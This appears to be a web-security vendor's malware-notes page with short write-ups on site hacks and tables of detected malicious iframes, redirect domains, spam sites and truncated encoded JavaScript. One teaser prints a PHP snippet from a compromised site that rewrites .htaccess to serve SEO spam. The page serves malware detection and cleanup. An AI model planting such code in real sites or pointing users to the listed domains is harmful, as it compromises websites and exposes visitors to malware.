Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

For many years, spam injections placed inside legitimate pages remain one of the prevalent types of black hat SEO hacks that we clean. Hackers constantly invent new tricks to make spam blocks invisible to human visitors while indexable by search engines.

Read More ...

Injecting malware into core files of CMS installations is one of the techniques attackers use. From the user’s perspective, it is easier to detect and remediate such cases if they are using a File Integrity Monitoring system. On the other hand, if they are not monitoring file changes, they could be afraid of modifying such core files, therefore leaving the website infected.

Read More ...

Website defacement is still a big issue for various website owners. It directly impacts on your online presence / visibility and as a consequence, it may get your website flagged as “Hacked” by different search engines.

Read More ...

Lately, we’ve uncovered and detailed lots of techniques being used against e-commerce platforms to steal sensitive information, mostly credit card and login credentials. With the holiday season approaching, e-commerce platforms become an even higher target due to increase in sales during the season.

Read More ...

I was assisting a client with their compromised website and came across a file called unsave.php that was primarily used to inject a rewrite into the .htaccess file so that the SEO spam payload of the file goday.php could be delivered to certain visitors sent to the directory hosting these files:

{
if ((filesize(".htaccess"))>100)
{
$out = fopen("../.htaccess", "w");
fwrite ($out, "RewriteEngine On
RewriteRule ^([A-Za-z0-9-]+).html$ goday.php?hl=$1 [L]");
fclose($out);
}

Read More ...

Latest malware entries

Hidden iframes

Latest hidden iframes our scanner have identified on compromised web sites.

# of sites infectedTypeMalware / Domains
14iframehttp://lussqbp.hopto.org/wordpress/?ARX8
12iframehttp://wfiyagleou.hopto.org/wordpress/?ARX8
11iframehttp://wojqwbbja.hopto.org/wordpress/?ARX8
9iframehttp://sitigadget.altervista.org/televideoframe.html
9iframehttp://frcyugso.hopto.org/wordpress/?ARX8
9iframehttp://ciaccia.altervista.org/Calendario-HelloKitty.html
4iframehttp://ywpkrcnr.ddnsking.com/wordpress/?ARX8
4iframehttp://wxgmlwa.ddnsking.com/wordpress/?ARX8
4iframehttp://gkmpvftdrc.ddnsking.com/wordpress/?ARX8
3iframehttp://qrkroeteyz.hopto.org/wordpress/?ARX8
3iframehttp://czwdtuod.hopto.org/wordpress/?ARX8
2iframehttp://www.ridersonline.it/planetblunt001/d.php
2iframehttp://upcmoxfeyl.ddnsking.com/wordpress/?ARX8
1iframehttp://www.maximsilencers.com/cgi-bin/tpwFDbM7.php
1iframehttp://kjyhkjedewhc.cu.cc/main.php?page=e1a5f2bf09ad6790
1iframehttp://jrtxcm.ddnsking.com/wordpress/?ARX8
1iframehttp://javachek.tk/507H
Limited view... Only the top entries being displayed.

Conditional redirections

Conditional redirections we have detected (based on user agents or referers).

# of sites infectedTypeMalware / Domains
17redirectionshttp://traf-extractor.ru
5redirectionshttp://supasweb.ru/blackmuscats?5
5redirectionshttp://osta-x.ru
5redirectionshttp://luxurytds.com/go.php?sid=1
3redirectionshttp://modrewrite.ru
3redirectionshttp://go60.ru
2redirectionshttp://www.brochure.eu.com/?folio=9PO6Z3MVF
2redirectionshttp://ww1.totalprogramasdwn.com/?folio=9POGF6H4I
1redirectionshttp://u22zz.ddldownload-now.7889523.com/?sov=1114707199
1redirectionshttp://olimptds.com/in.cgi?6
1redirectionshttp://nice.sbigg.cn/jord/?alaskafishon.com
1redirectionshttp://my-biziness.ru
1redirectionshttp://maxporn.biz/
1redirectionshttp://kpero.ddns.me.uk/index.html
Limited view... Only the top entries being displayed.

Spammers

Latest spammers we have detected sending comment, forum or SEO spam.

# of sites infectedTypeMalware / Domains
20spammerhttp://123livesex.com/,forumspam,2014-01
20spammerhttp://20min.ch,forumspam,2014-01
20spammerhttp://90210daily.com/,forumspam,2014-01
20spammerhttp://EzAdBlaster.com,forumspam,2014-01
20spammerhttp://absolutefringe.com,forumspam,2014-01
20spammerhttp://adaptfunrun.org/,forumspam,2014-01
20spammerhttp://andresmarcossanchez.com/MichaelKors/ ,forumspam,2014-01
20spammerhttp://appliancelandinc.com/,forumspam,2014-01
20spammerhttp://audiobookkeeper.ru/,forumspam,2014-01
20spammerhttp://australiainternetsearch.com/,forumspam,2014-01
20spammerhttp://autism.sedl.org/index.php/about-us,forumspam,2014-01
20spammerhttp://axanaxplease.com/,forumspam,2014-01
20spammerhttp://ayurvedatradicional.com/wordpress/ ,forumspam,2014-01
20spammerhttp://azezhomeloans.com/body.html,forumspam,2014-01
20spammerhttp://baltimorecomiccon.com/sponsors/,forumspam,2014-01
20spammerhttp://bashkiaprrenjas.com/,forumspam,2014-01
20spammerhttp://bellezzaamica.it/Moncler-Sale-With-Free-Shipping.html,forumspam,2014-01
20spammerhttp://birdsofstkittsnevis.com/files/,forumspam,2014-01
20spammerhttp://bmaphoenix.org/young-professionals/,forumspam,2014-01
20spammerhttp://bradblaze.com.au/,forumspam,2014-01
Limited view... Only the top entries being displayed.

Encoded javascript

Encoded javascript (redirecting to blackhole and other exploit kits) or to build a remote call.

# of sites infectedTypeMalware / Domains
11javascripthttp://jqueryapi.info/?getsrc=ok
8javascripthttp://div-class-container.ru/m/": var a8a09b1=[62,122,162,167,180,94,177,178,183,170,163,123,9...
241javascript<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+6...
163javascript<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+6...
121javascript<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+6...
106javascript<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+6...
102javascript<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+6...
101javascript<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+6...
85javascript<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+6...
85javascript<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+6...
77javascript<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+6...
71javascript<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+6...
66javascript<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+6...
65javascript<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+6...
64javascript<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+6...
63javascript<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+6...
61javascript<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+6...
60javascript<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+6...
60javascript<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+6...
59javascript<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+6...
Limited view... Only the top entries being displayed.